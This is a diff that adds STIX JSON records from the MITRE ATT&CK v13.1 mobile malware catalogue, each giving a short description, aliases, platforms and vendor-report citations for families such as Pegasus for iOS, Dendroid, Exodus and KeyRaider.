+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--852ae637-8c61-448f-b3b5-1a4d92e9beeb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:33:55.061Z", + "name": "AbstractEmu", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "AbstractEmu" + ], + "type": "malware", + "id": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "created": "2023-02-06T18:48:41.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1061", + "external_id": "S1061" + }, + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json new file mode 100644 index 0000000000000000000000000000000000000000..f78441e448620905d1b50dfee802090c6e4604a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--b77c17d3-ae43-490d-9989-420b6b9727c0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exodus", + "Exodus One", + "Exodus Two" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "type": "malware", + "created": "2019-09-03T19:45:47.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0405", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0405" + }, + { + "source_name": "Exodus One", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "Exodus Two", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T17:15:52.191Z", + "name": "Exodus", + "description": "[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json new file mode 100644 index 0000000000000000000000000000000000000000..708541c86c2dd85bd2d300daa6eb1f189a6f97b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--bd696d62-8af8-433c-aa13-90735085ac48", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Dendroid" + ], + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created": "2017-10-25T14:48:37.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json new file mode 100644 index 0000000000000000000000000000000000000000..7f51694bbcc028f0035b67899bca55d6710e4d5e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--9842f376-d90d-4705-b0b6-135e1fb6ed34", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created": "2017-10-25T14:48:37.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json new file mode 100644 index 0000000000000000000000000000000000000000..844ed1a483e04e598066dfd9aa6bff2ce23d44a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--28411bd5-b4de-4307-8630-5aeb5ac68356", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Desert Scorpion" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "type": "malware", + "created": "2020-09-11T14:54:16.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0505", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0505" + }, + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2021-04-19T17:11:50.159Z", + "name": "Desert Scorpion", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json new file mode 100644 index 0000000000000000000000000000000000000000..9970e42129ada25d2bef9896cac79917452407b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--815b49aa-accb-45a1-ad61-17d1863401c5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for iOS", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for iOS" + ], + "type": "malware", + "id": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "created": "2017-10-25T14:48:44.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0289", + "external_id": "S0289" + }, + { + "source_name": "Pegasus for iOS", + "description": "(Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab)" + }, + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json new file mode 100644 index 0000000000000000000000000000000000000000..1d5c0c33ec4c48b359c15da29a9bfbc50027a4f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--3a257722-aca9-4278-9ddc-78e4681a94f5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Tangelo" + ], + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json new file mode 100644 index 0000000000000000000000000000000000000000..b449d083940d5b9c320037d8f44978d3f2cc6fa8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--055dfbc1-3093-4d29-9376-32d9803399a4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RCSAndroid" + ], + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created": "2017-10-25T14:48:38.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json new file mode 100644 index 0000000000000000000000000000000000000000..728016fcb1f93a0eddf557faaaceafe0ccf45eed --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--24d42bbf-e163-4028-ad39-db9fdc867ae3", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "type": "malware", + "created": "2020-04-24T15:06:32.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0425", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.235Z", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json new file mode 100644 index 0000000000000000000000000000000000000000..220579e09ab6b42daff01fd518544ee5f95b427e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--67aa9091-62d0-43d1-ba3d-d7025649da7e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Skygofree" + ], + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json new file mode 100644 index 0000000000000000000000000000000000000000..3cc841215821ce755f849e2634b7150c05f20d14 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1d42315c-8368-4a56-9201-535e1e8a28da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created": "2017-10-25T14:48:43.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json new file mode 100644 index 0000000000000000000000000000000000000000..11e29ccb0392fd57d6e9c875d0b14bde1421923b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2a7a4d18-7cc7-4a95-b821-dcb39bfbdd83", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created": "2017-10-25T14:48:44.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store\u2019s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json new file mode 100644 index 0000000000000000000000000000000000000000..4c78a99015788198e656023b2a0b5e09a54c7c01 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--2bec3cf3-c7dc-4300-832a-4b3855d554b2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "type": "malware", + "created": "2020-12-24T21:50:02.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0550", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T17:05:42.253Z", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json new file mode 100644 index 0000000000000000000000000000000000000000..3ab3036547ddb79c64bd7b4aa64eef0d51a3982f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--39cb50f9-d713-43c6-8171-fc3722665d1b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Twitoor" + ], + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created": "2017-10-25T14:48:42.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json new file mode 100644 index 0000000000000000000000000000000000000000..2d9e7effef6615d9a640149958aa539dc5a5cab4 --- /dev/null +++ 